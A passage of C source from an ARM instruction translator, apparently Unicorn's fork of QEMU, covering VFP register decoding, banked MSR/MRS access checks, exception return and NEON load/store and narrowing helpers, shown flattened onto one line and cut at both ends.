1)) #endif #define VFP_DREG(reg, insn, bigbit, smallbit) do { \ if (dc_isar_feature(aa32_simd_r32, s)) { \ reg = (((insn) >> (bigbit)) & 0x0f) \ | (((insn) >> ((smallbit) - 4)) & 0x10); \ } else { \ if (insn & (1 << (smallbit))) \ return 1; \ reg = ((insn) >> (bigbit)) & 0x0f; \ }} while (0) #ifdef _MSC_VER #define VFP_SREG_D(insn) VFP_SREG_POS(insn, 12, 22) #define VFP_DREG_D(reg, insn) VFP_DREG(reg, insn, 12, 22) #define VFP_SREG_N(insn) VFP_SREG_POS(insn, 16, 7) #define VFP_DREG_N(reg, insn) VFP_DREG(reg, insn, 16, 7) #define VFP_SREG_M(insn) VFP_SREG_NEG(insn, 0, 5) #define VFP_DREG_M(reg, insn) VFP_DREG(reg, insn, 0, 5) #else #define VFP_SREG_D(insn) VFP_SREG(insn, 12, 22) #define VFP_DREG_D(reg, insn) VFP_DREG(reg, insn, 12, 22) #define VFP_SREG_N(insn) VFP_SREG(insn, 16, 7) #define VFP_DREG_N(reg, insn) VFP_DREG(reg, insn, 16, 7) #define VFP_SREG_M(insn) VFP_SREG(insn, 0, 5) #define VFP_DREG_M(reg, insn) VFP_DREG(reg, insn, 0, 5) #endif static void gen_neon_dup_low16(TCGContext *tcg_ctx, TCGv_i32 var) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext16u_i32(tcg_ctx, var, var); tcg_gen_shli_i32(tcg_ctx, tmp, var, 16); tcg_gen_or_i32(tcg_ctx, var, var, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static void gen_neon_dup_high16(TCGContext *tcg_ctx, TCGv_i32 var) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, var, var, 0xffff0000); tcg_gen_shri_i32(tcg_ctx, tmp, var, 16); tcg_gen_or_i32(tcg_ctx, var, var, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static inline bool use_goto_tb(DisasContext *s, target_ulong dest) { struct uc_struct *uc = s->uc; return (s->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK) || ((s->base.pc_next - 1) & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static void gen_goto_ptr(TCGContext *tcg_ctx) { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } /* This will end the TB but doesn't guarantee we'll return to * cpu_loop_exec. Any live exit_requests will be processed as we * enter the next TB. */ static void gen_goto_tb(DisasContext *s, int n, target_ulong dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (use_goto_tb(s, dest)) { tcg_gen_goto_tb(tcg_ctx, n); gen_set_pc_im(s, dest); tcg_gen_exit_tb(tcg_ctx, s->base.tb, n); } else { gen_set_pc_im(s, dest); gen_goto_ptr(tcg_ctx); } s->base.is_jmp = DISAS_NORETURN; } static inline void gen_jmp (DisasContext *s, uint32_t dest) { if (unlikely(is_singlestepping(s))) { /* An indirect jump so that we still trigger the debug exception. */ gen_set_pc_im(s, dest); s->base.is_jmp = DISAS_JUMP; } else { gen_goto_tb(s, 0, dest); } } static inline void gen_mulxy(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1, int x, int y) { if (x) tcg_gen_sari_i32(tcg_ctx, t0, t0, 16); else gen_sxth(t0); if (y) tcg_gen_sari_i32(tcg_ctx, t1, t1, 16); else gen_sxth(t1); tcg_gen_mul_i32(tcg_ctx, t0, t0, t1); } /* Return the mask of PSR bits set by a MSR instruction. */ static uint32_t msr_mask(DisasContext *s, int flags, int spsr) { uint32_t mask = 0; if (flags & (1 << 0)) { mask |= 0xff; } if (flags & (1 << 1)) { mask |= 0xff00; } if (flags & (1 << 2)) { mask |= 0xff0000; } if (flags & (1 << 3)) { mask |= 0xff000000; } /* Mask out undefined and reserved bits. */ mask &= aarch32_cpsr_valid_mask(s->features, s->isar); /* Mask out execution state. */ if (!spsr) { mask &= ~CPSR_EXEC; } /* Mask out privileged bits. */ if (IS_USER(s)) { mask &= CPSR_USER; } return mask; } /* Returns nonzero if access to the PSR is not permitted. Marks t0 as dead. */ static int gen_set_psr(DisasContext *s, uint32_t mask, int spsr, TCGv_i32 t0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (spsr) { /* ??? This is also undefined in system mode. */ if (IS_USER(s)) return 1; tmp = load_cpu_field(tcg_ctx, spsr); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, ~mask); tcg_gen_andi_i32(tcg_ctx, t0, t0, mask); tcg_gen_or_i32(tcg_ctx, tmp, tmp, t0); store_cpu_field(tcg_ctx, tmp, spsr); } else { gen_set_cpsr(tcg_ctx, t0, mask); } tcg_temp_free_i32(tcg_ctx, t0); gen_lookup_tb(s); return 0; } /* Returns nonzero if access to the PSR is not permitted. */ static int gen_set_psr_im(DisasContext *s, uint32_t mask, int spsr, uint32_t val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, val); return gen_set_psr(s, mask, spsr, tmp); } static bool msr_banked_access_decode(DisasContext *s, int r, int sysm, int rn, int *tgtmode, int *regno) { /* Decode the r and sysm fields of MSR/MRS banked accesses into * the target mode and register number, and identify the various * unpredictable cases. * MSR (banked) and MRS (banked) are CONSTRAINED UNPREDICTABLE if: * + executed in user mode * + using R15 as the src/dest register * + accessing an unimplemented register * + accessing a register that's inaccessible at current PL/security state* * + accessing a register that you could access with a different insn * We choose to UNDEF in all these cases. * Since we don't know which of the various AArch32 modes we are in * we have to defer some checks to runtime. * Accesses to Monitor mode registers from Secure EL1 (which implies * that EL3 is AArch64) must trap to EL3. * * If the access checks fail this function will emit code to take * an exception and return false. Otherwise it will return true, * and set *tgtmode and *regno appropriately. */ int exc_target = default_exception_el(s); /* These instructions are present only in ARMv8, or in ARMv7 with the * Virtualization Extensions. */ if (!arm_dc_feature(s, ARM_FEATURE_V8) && !arm_dc_feature(s, ARM_FEATURE_EL2)) { goto undef; } if (IS_USER(s) || rn == 15) { goto undef; } /* The table in the v8 ARM ARM section F5.2.3 describes the encoding * of registers into (r, sysm). */ if (r) { /* SPSRs for other modes */ switch (sysm) { case 0xe: /* SPSR_fiq */ *tgtmode = ARM_CPU_MODE_FIQ; break; case 0x10: /* SPSR_irq */ *tgtmode = ARM_CPU_MODE_IRQ; break; case 0x12: /* SPSR_svc */ *tgtmode = ARM_CPU_MODE_SVC; break; case 0x14: /* SPSR_abt */ *tgtmode = ARM_CPU_MODE_ABT; break; case 0x16: /* SPSR_und */ *tgtmode = ARM_CPU_MODE_UND; break; case 0x1c: /* SPSR_mon */ *tgtmode = ARM_CPU_MODE_MON; break; case 0x1e: /* SPSR_hyp */ *tgtmode = ARM_CPU_MODE_HYP; break; default: /* unallocated */ goto undef; } /* We arbitrarily assign SPSR a register number of 16. */ *regno = 16; } else { /* general purpose registers for other modes */ switch (sysm) { case 0x0: /* 0b00xxx : r8_usr ... r14_usr */ case 0x1: /* 0b00xxx : r8_usr ... r14_usr */ case 0x2: /* 0b00xxx : r8_usr ... r14_usr */ case 0x3: /* 0b00xxx : r8_usr ... r14_usr */ case 0x4: /* 0b00xxx : r8_usr ... r14_usr */ case 0x5: /* 0b00xxx : r8_usr ... r14_usr */ case 0x6: /* 0b00xxx : r8_usr ... r14_usr */ *tgtmode = ARM_CPU_MODE_USR; *regno = sysm + 8; break; case 0x8: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0x9: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xa: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xb: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xc: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xd: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xe: /* 0b01xxx : r8_fiq ... r14_fiq */ *tgtmode = ARM_CPU_MODE_FIQ; *regno = sysm; break; case 0x10: /* 0b1000x : r14_irq, r13_irq */ case 0x11: /* 0b1000x : r14_irq, r13_irq */ *tgtmode = ARM_CPU_MODE_IRQ; *regno = sysm & 1 ? 13 : 14; break; case 0x12: /* 0b1001x : r14_svc, r13_svc */ case 0x13: /* 0b1001x : r14_svc, r13_svc */ *tgtmode = ARM_CPU_MODE_SVC; *regno = sysm & 1 ? 13 : 14; break; case 0x14: /* 0b1010x : r14_abt, r13_abt */ case 0x15: /* 0b1010x : r14_abt, r13_abt */ *tgtmode = ARM_CPU_MODE_ABT; *regno = sysm & 1 ? 13 : 14; break; case 0x16: /* 0b1011x : r14_und, r13_und */ case 0x17: /* 0b1011x : r14_und, r13_und */ *tgtmode = ARM_CPU_MODE_UND; *regno = sysm & 1 ? 13 : 14; break; case 0x1c: /* 0b1110x : r14_mon, r13_mon */ case 0x1d: /* 0b1110x : r14_mon, r13_mon */ *tgtmode = ARM_CPU_MODE_MON; *regno = sysm & 1 ? 13 : 14; break; case 0x1e: /* 0b1111x : elr_hyp, r13_hyp */ case 0x1f: /* 0b1111x : elr_hyp, r13_hyp */ *tgtmode = ARM_CPU_MODE_HYP; /* Arbitrarily pick 17 for ELR_Hyp (which is not a banked LR!) */ *regno = sysm & 1 ? 13 : 17; break; default: /* unallocated */ goto undef; } } /* Catch the 'accessing inaccessible register' cases we can detect * at translate time. */ switch (*tgtmode) { case ARM_CPU_MODE_MON: if (!arm_dc_feature(s, ARM_FEATURE_EL3) || s->ns) { goto undef; } if (s->current_el == 1) { /* If we're in Secure EL1 (which implies that EL3 is AArch64) * then accesses to Mon registers trap to EL3 */ exc_target = 3; goto undef; } break; case ARM_CPU_MODE_HYP: /* * SPSR_hyp and r13_hyp can only be accessed from Monitor mode * (and so we can forbid accesses from EL2 or below). elr_hyp * can be accessed also from Hyp mode, so forbid accesses from * EL0 or EL1. */ if (!arm_dc_feature(s, ARM_FEATURE_EL2) || s->current_el < 2 || (s->current_el < 3 && *regno != 17)) { goto undef; } break; default: break; } return true; undef: /* If we get here then some access check did not pass */ gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_uncategorized(), exc_target); return false; } static void gen_msr_banked(DisasContext *s, int r, int sysm, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_reg, tcg_tgtmode, tcg_regno; int tgtmode = 0, regno = 0; if (!msr_banked_access_decode(s, r, sysm, rn, &tgtmode, ®no)) { return; } /* Sync state because msr_banked() can raise exceptions */ gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tcg_reg = load_reg(s, rn); tcg_tgtmode = tcg_const_i32(tcg_ctx, tgtmode); tcg_regno = tcg_const_i32(tcg_ctx, regno); gen_helper_msr_banked(tcg_ctx, tcg_ctx->cpu_env, tcg_reg, tcg_tgtmode, tcg_regno); tcg_temp_free_i32(tcg_ctx, tcg_tgtmode); tcg_temp_free_i32(tcg_ctx, tcg_regno); tcg_temp_free_i32(tcg_ctx, tcg_reg); s->base.is_jmp = DISAS_UPDATE; } static void gen_mrs_banked(DisasContext *s, int r, int sysm, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_reg, tcg_tgtmode, tcg_regno; int tgtmode = 0, regno = 0; if (!msr_banked_access_decode(s, r, sysm, rn, &tgtmode, ®no)) { return; } /* Sync state because mrs_banked() can raise exceptions */ gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tcg_reg = tcg_temp_new_i32(tcg_ctx); tcg_tgtmode = tcg_const_i32(tcg_ctx, tgtmode); tcg_regno = tcg_const_i32(tcg_ctx, regno); gen_helper_mrs_banked(tcg_ctx, tcg_reg, tcg_ctx->cpu_env, tcg_tgtmode, tcg_regno); tcg_temp_free_i32(tcg_ctx, tcg_tgtmode); tcg_temp_free_i32(tcg_ctx, tcg_regno); store_reg(s, rn, tcg_reg); s->base.is_jmp = DISAS_UPDATE; } /* Store value to PC as for an exception return (ie don't * mask bits). The subsequent call to gen_helper_cpsr_write_eret() * will do the masking based on the new value of the Thumb bit. */ static void store_pc_exc_ret(DisasContext *s, TCGv_i32 pc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_R[15], pc); tcg_temp_free_i32(tcg_ctx, pc); } /* Generate a v6 exception return. Marks both values as dead. */ static void gen_rfe(DisasContext *s, TCGv_i32 pc, TCGv_i32 cpsr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_pc_exc_ret(s, pc); /* The cpsr_write_eret helper will mask the low bits of PC * appropriately depending on the new Thumb bit, so it must * be called after storing the new PC. */ if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { // gen_io_start(tcg_ctx); } gen_helper_cpsr_write_eret(tcg_ctx, tcg_ctx->cpu_env, cpsr); tcg_temp_free_i32(tcg_ctx, cpsr); /* Must exit loop to check un-masked IRQs */ s->base.is_jmp = DISAS_EXIT; } /* Generate an old-style exception return. Marks pc as dead. */ static void gen_exception_return(DisasContext *s, TCGv_i32 pc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_rfe(s, pc, load_cpu_field(tcg_ctx, spsr)); } #define CPU_V001 tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1 static inline void gen_neon_add(TCGContext *tcg_ctx, int size, TCGv_i32 t0, TCGv_i32 t1) { switch (size) { case 0: gen_helper_neon_add_u8(tcg_ctx, t0, t0, t1); break; case 1: gen_helper_neon_add_u16(tcg_ctx, t0, t0, t1); break; case 2: tcg_gen_add_i32(tcg_ctx, t0, t0, t1); break; default: abort(); } } static inline void gen_neon_rsb(TCGContext *tcg_ctx, int size, TCGv_i32 t0, TCGv_i32 t1) { switch (size) { case 0: gen_helper_neon_sub_u8(tcg_ctx, t0, t1, t0); break; case 1: gen_helper_neon_sub_u16(tcg_ctx, t0, t1, t0); break; case 2: tcg_gen_sub_i32(tcg_ctx, t0, t1, t0); break; default: return; } } /* 32-bit pairwise ops end up the same as the elementwise versions. */ #define gen_helper_neon_pmax_s32 tcg_gen_smax_i32 #define gen_helper_neon_pmax_u32 tcg_gen_umax_i32 #define gen_helper_neon_pmin_s32 tcg_gen_smin_i32 #define gen_helper_neon_pmin_u32 tcg_gen_umin_i32 #define GEN_NEON_INTEGER_OP_ENV(name) do { \ switch ((size << 1) | u) { \ case 0: \ gen_helper_neon_##name##_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 1: \ gen_helper_neon_##name##_u8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 2: \ gen_helper_neon_##name##_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 3: \ gen_helper_neon_##name##_u16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 4: \ gen_helper_neon_##name##_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 5: \ gen_helper_neon_##name##_u32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ default: return 1; \ }} while (0) #define GEN_NEON_INTEGER_OP(name) do { \ switch ((size << 1) | u) { \ case 0: \ gen_helper_neon_##name##_s8(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 1: \ gen_helper_neon_##name##_u8(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 2: \ gen_helper_neon_##name##_s16(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 3: \ gen_helper_neon_##name##_u16(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 4: \ gen_helper_neon_##name##_s32(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 5: \ gen_helper_neon_##name##_u32(tcg_ctx, tmp, tmp, tmp2); \ break; \ default: return 1; \ }} while (0) static TCGv_i32 neon_load_scratch(TCGContext *tcg_ctx, int scratch) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.scratch[scratch])); return tmp; } static void neon_store_scratch(TCGContext *tcg_ctx, int scratch, TCGv_i32 var) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.scratch[scratch])); tcg_temp_free_i32(tcg_ctx, var); } static inline TCGv_i32 neon_get_scalar(TCGContext *tcg_ctx, int size, int reg) { TCGv_i32 tmp; if (size == 1) { tmp = neon_load_reg(tcg_ctx, reg & 7, reg >> 4); if (reg & 8) { gen_neon_dup_high16(tcg_ctx, tmp); } else { gen_neon_dup_low16(tcg_ctx, tmp); } } else { tmp = neon_load_reg(tcg_ctx, reg & 15, reg >> 4); } return tmp; } static int gen_neon_unzip(TCGContext *tcg_ctx, int rd, int rm, int size, int q) { TCGv_ptr pd, pm; if (!q && size == 2) { return 1; } pd = vfp_reg_ptr(tcg_ctx, true, rd); pm = vfp_reg_ptr(tcg_ctx, true, rm); if (q) { switch (size) { case 0: gen_helper_neon_qunzip8(tcg_ctx, pd, pm); break; case 1: gen_helper_neon_qunzip16(tcg_ctx, pd, pm); break; case 2: gen_helper_neon_qunzip32(tcg_ctx, pd, pm); break; default: abort(); } } else { switch (size) { case 0: gen_helper_neon_unzip8(tcg_ctx, pd, pm); break; case 1: gen_helper_neon_unzip16(tcg_ctx, pd, pm); break; default: abort(); } } tcg_temp_free_ptr(tcg_ctx, pd); tcg_temp_free_ptr(tcg_ctx, pm); return 0; } static int gen_neon_zip(TCGContext *tcg_ctx, int rd, int rm, int size, int q) { TCGv_ptr pd, pm; if (!q && size == 2) { return 1; } pd = vfp_reg_ptr(tcg_ctx, true, rd); pm = vfp_reg_ptr(tcg_ctx, true, rm); if (q) { switch (size) { case 0: gen_helper_neon_qzip8(tcg_ctx, pd, pm); break; case 1: gen_helper_neon_qzip16(tcg_ctx, pd, pm); break; case 2: gen_helper_neon_qzip32(tcg_ctx, pd, pm); break; default: abort(); } } else { switch (size) { case 0: gen_helper_neon_zip8(tcg_ctx, pd, pm); break; case 1: gen_helper_neon_zip16(tcg_ctx, pd, pm); break; default: abort(); } } tcg_temp_free_ptr(tcg_ctx, pd); tcg_temp_free_ptr(tcg_ctx, pm); return 0; } static void gen_neon_trn_u8(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 rd, tmp; rd = tcg_temp_new_i32(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, rd, t0, 8); tcg_gen_andi_i32(tcg_ctx, rd, rd, 0xff00ff00); tcg_gen_andi_i32(tcg_ctx, tmp, t1, 0x00ff00ff); tcg_gen_or_i32(tcg_ctx, rd, rd, tmp); tcg_gen_shri_i32(tcg_ctx, t1, t1, 8); tcg_gen_andi_i32(tcg_ctx, t1, t1, 0x00ff00ff); tcg_gen_andi_i32(tcg_ctx, tmp, t0, 0xff00ff00); tcg_gen_or_i32(tcg_ctx, t1, t1, tmp); tcg_gen_mov_i32(tcg_ctx, t0, rd); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, rd); } static void gen_neon_trn_u16(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 rd, tmp; rd = tcg_temp_new_i32(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, rd, t0, 16); tcg_gen_andi_i32(tcg_ctx, tmp, t1, 0xffff); tcg_gen_or_i32(tcg_ctx, rd, rd, tmp); tcg_gen_shri_i32(tcg_ctx, t1, t1, 16); tcg_gen_andi_i32(tcg_ctx, tmp, t0, 0xffff0000); tcg_gen_or_i32(tcg_ctx, t1, t1, tmp); tcg_gen_mov_i32(tcg_ctx, t0, rd); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, rd); } static struct { int nregs; int interleave; int spacing; } const neon_ls_element_type[11] = { {1, 4, 1}, {1, 4, 2}, {4, 1, 1}, {2, 2, 2}, {1, 3, 1}, {1, 3, 2}, {3, 1, 1}, {1, 1, 1}, {1, 2, 1}, {1, 2, 2}, {2, 1, 1} }; /* Translate a NEON load/store element instruction. Return nonzero if the instruction is invalid. */ static int disas_neon_ls_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd, rn, rm; int op; int nregs; int interleave; int spacing; int stride; int size; int reg; int load; int n; int vec_size; int mmu_idx; MemOp endian; TCGv_i32 addr; TCGv_i32 tmp; TCGv_i32 tmp2; TCGv_i64 tmp64; /* FIXME: this access check should not take precedence over UNDEF * for invalid encodings; we will generate incorrect syndrome information * for attempts to execute invalid vfp/neon encodings with FP disabled. */ if (s->fp_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_simd_access_trap(1, 0xe, false), s->fp_excp_el); return 0; } if (!s->vfp_enabled) return 1; VFP_DREG_D(rd, insn); rn = (insn >> 16) & 0xf; rm = insn & 0xf; load = (insn & (1 << 21)) != 0; endian = s->be_data; mmu_idx = get_mem_index(s); if ((insn & (1 << 23)) == 0) { /* Load store all elements. */ op = (insn >> 8) & 0xf; size = (insn >> 6) & 3; if (op > 10) return 1; /* Catch UNDEF cases for bad values of align field */ switch (op & 0xc) { case 4: if (((insn >> 5) & 1) == 1) { return 1; } break; case 8: if (((insn >> 4) & 3) == 3) { return 1; } break; default: break; } nregs = neon_ls_element_type[op].nregs; interleave = neon_ls_element_type[op].interleave; spacing = neon_ls_element_type[op].spacing; if (size == 3 && (interleave | spacing) != 1) { return 1; } /* For our purposes, bytes are always little-endian. */ if (size == 0) { endian = MO_LE; } /* Consecutive little-endian elements from a single register * can be promoted to a larger little-endian operation. */ if (interleave == 1 && endian == MO_LE) { size = 3; } tmp64 = tcg_temp_new_i64(tcg_ctx); addr = tcg_temp_new_i32(tcg_ctx); tmp2 = tcg_const_i32(tcg_ctx, 1 << size); load_reg_var(s, addr, rn); for (reg = 0; reg < nregs; reg++) { for (n = 0; n < 8 >> size; n++) { int xs; for (xs = 0; xs < interleave; xs++) { int tt = rd + reg + spacing * xs; if (load) { gen_aa32_ld_i64(s, tmp64, addr, mmu_idx, endian | size); neon_store_element64(tcg_ctx, tt, n, size, tmp64); } else { neon_load_element64(tcg_ctx, tmp64, tt, n, size); gen_aa32_st_i64(s, tmp64, addr, mmu_idx, endian | size); } tcg_gen_add_i32(tcg_ctx, addr, addr, tmp2); } } } tcg_temp_free_i32(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i64(tcg_ctx, tmp64); stride = nregs * interleave * 8; } else { size = (insn >> 10) & 3; if (size == 3) { /* Load single element to all lanes. */ int a = (insn >> 4) & 1; if (!load) { return 1; } size = (insn >> 6) & 3; nregs = ((insn >> 8) & 3) + 1; if (size == 3) { if (nregs != 4 || a == 0) { return 1; } /* For VLD4 size==3 a == 1 means 32 bits at 16 byte alignment */ size = 2; } if (nregs == 1 && a == 1 && size == 0) { return 1; } if (nregs == 3 && a == 1) { return 1; } addr = tcg_temp_new_i32(tcg_ctx); load_reg_var(s, addr, rn); /* VLD1 to all lanes: bit 5 indicates how many Dregs to write. * VLD2/3/4 to all lanes: bit 5 indicates register stride. */ stride = (insn & (1 << 5)) ? 2 : 1; vec_size = nregs == 1 ? stride * 8 : 8; tmp = tcg_temp_new_i32(tcg_ctx); for (reg = 0; reg < nregs; reg++) { gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), s->be_data | size); if ((rd & 1) && vec_size == 16) { /* We cannot write 16 bytes at once because the * destination is unaligned. */ tcg_gen_gvec_dup_i32(tcg_ctx, size, neon_reg_offset(rd, 0), 8, 8, tmp); tcg_gen_gvec_mov(tcg_ctx, 0, neon_reg_offset(rd + 1, 0), neon_reg_offset(rd, 0), 8, 8); } else { tcg_gen_gvec_dup_i32(tcg_ctx, size, neon_reg_offset(rd, 0), vec_size, vec_size, tmp); } tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size); rd += stride; } tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, addr); stride = (1 << size) * nregs; } else { /* Single element. */ int idx = (insn >> 4) & 0xf; int reg_idx; switch (size) { case 0: reg_idx = (insn >> 5) & 7; stride = 1; break; case 1: reg_idx = (insn >> 6) & 3; stride = (insn & (1 << 5)) ? 2 : 1; break; case 2: reg_idx = (insn >> 7) & 1; stride = (insn & (1 << 6)) ? 2 : 1; break; default: abort(); } nregs = ((insn >> 8) & 3) + 1; /* Catch the UNDEF cases. This is unavoidably a bit messy. */ switch (nregs) { case 1: if (((idx & (1 << size)) != 0) || (size == 2 && ((idx & 3) == 1 || (idx & 3) == 2))) { return 1; } break; case 3: if ((idx & 1) != 0) { return 1; } /* fall through */ case 2: if (size == 2 && (idx & 2) != 0) { return 1; } break; case 4: if ((size == 2) && ((idx & 3) == 3)) { return 1; } break; default: abort(); } if ((rd + stride * (nregs - 1)) > 31) { /* Attempts to write off the end of the register file * are UNPREDICTABLE; we choose to UNDEF because otherwise * the neon_load_reg() would write off the end of the array. */ return 1; } tmp = tcg_temp_new_i32(tcg_ctx); addr = tcg_temp_new_i32(tcg_ctx); load_reg_var(s, addr, rn); for (reg = 0; reg < nregs; reg++) { if (load) { gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), s->be_data | size); neon_store_element(tcg_ctx, rd, reg_idx, size, tmp); } else { /* Store */ neon_load_element(tcg_ctx, tmp, rd, reg_idx, size); gen_aa32_st_i32(s, tmp, addr, get_mem_index(s), s->be_data | size); } rd += stride; tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size); } tcg_temp_free_i32(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, tmp); stride = nregs * (1 << size); } } if (rm != 15) { TCGv_i32 base; base = load_reg(s, rn); if (rm == 13) { tcg_gen_addi_i32(tcg_ctx, base, base, stride); } else { TCGv_i32 index; index = load_reg(s, rm); tcg_gen_add_i32(tcg_ctx, base, base, index); tcg_temp_free_i32(tcg_ctx, index); } store_reg(s, rn, base); } return 0; } static inline void gen_neon_narrow(TCGContext *tcg_ctx, int size, TCGv_i32 dest, TCGv_i64 src) { switch (size) { case 0: gen_helper_neon_narrow_u8(tcg_ctx, dest, src); break; case 1: gen_helper_neon_narrow_u16(tcg_ctx, dest, src); break; case 2: tcg_gen_extrl_i64_i32(tcg_ctx, dest, src); break; default: abort(); } } static inline void gen_neon_narrow_sats(TCGContext *tcg_ctx, int size, TCGv_i32 dest, TCGv_i64 src) { switch (size) { case 0: gen_helper_neon_narrow_sat_s8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 1: gen_helper_neon_narrow_sat_s16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 2: gen_helper_neon_narrow_sat_s32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; default: abort(); } } static inline void gen_neon_narrow_satu(TCGContext *tcg_ctx, int size, TCGv_i32 dest, TCGv_i64 src) { switch (size) { case 0: gen_helper_neon_narrow_sat_u8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 1: gen_helper_neon_narrow_sat_u16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 2: gen_helper_neon_narrow_sat_u32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; default: abort(); } } static inline void gen_neon_unarrow_sats(TCGContext *tcg_ctx, int size, TCGv_i32 dest, TCGv_i64 src) { switch (size) { case 0: gen_helper_neon_unarrow_sat8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 1: gen_helper_neon_unarrow_sat16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 2: gen_helper_neon_unarrow_sat32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; default: abort(); } } static inline void gen_neon_shift_narrow(TCGContext *tcg_ctx, int size, TCGv_i32 var, TCGv_i32 shift, int q, int u) { if (q) { if (u) { switch (size) { case 1: gen_helper_neon_rshl_u16(tcg_ctx, var, var, shift); break; case 2: gen_helper_neon_rshl_u32(tcg_ctx, var, var, shift); break; default: abort(); } } else { switch (size) { case 1: gen_helper_neon_rshl_s16(tcg_ctx, var, var, shift); break; case 2: gen_helper_neon_rshl_s32(tcg_ctx, var, var, shift); break; default: abort(); } } } else { if (u) { switch (size) { case 1: gen_helper_neon_shl_u16(tcg_ctx, var, var, shift); break; case 2: gen_ushl_i32(tcg_ctx, var, var, shift); break; default: abort(); } } else { switch (size) { case 1: gen_helper_neon_shl_s16(tcg_ctx, var, var, shift); break; case 2: gen_sshl_i32(tcg_ctx, var, var, shift); break; default: abort(); } } } } static inline void gen_neon_widen(TCGContext *tcg_ctx, TCGv_i64 dest, TCGv_i32 src, int size, int u) { if (u) { switch (size) { case 0: gen_helper_neon_widen_u8(tcg_ctx, dest, src); break; case 1: gen_helper_neon_widen_u16(tcg_ctx, dest, src); break; case 2: tcg_gen_extu_i32_i64(tcg_ctx, dest, src); break; default: abort(); } } else { switch (size) { case 0: gen_helper_neon_widen_s8(tcg_ctx, dest, src); break; case 1: gen_helper_neon_widen_s16(tcg_ctx, dest, src); break; case 2: tcg_gen_ext_i32_i64(tcg_ctx, dest, src); break; default: abort(); } } tcg_temp_free_i32(tcg_ctx, src); } static inline void gen_neon_addl(TCGContext *tcg_ctx, int size) { switch (size) { case 0: gen_helper_neon_addl_u16(tcg_ctx, CPU_V001); break; case 1: gen_helper_neon_addl_u32(tcg_ctx, CPU_V001); break; case 2: tcg_gen_add_i64(tcg_ctx, CPU_V001); break; default: abort(); } } static inline void gen_neon_subl(TCGContext *tcg_ctx, int size) { switch (size) { case 0: gen_helper_neon_subl_u16(tcg_ctx, 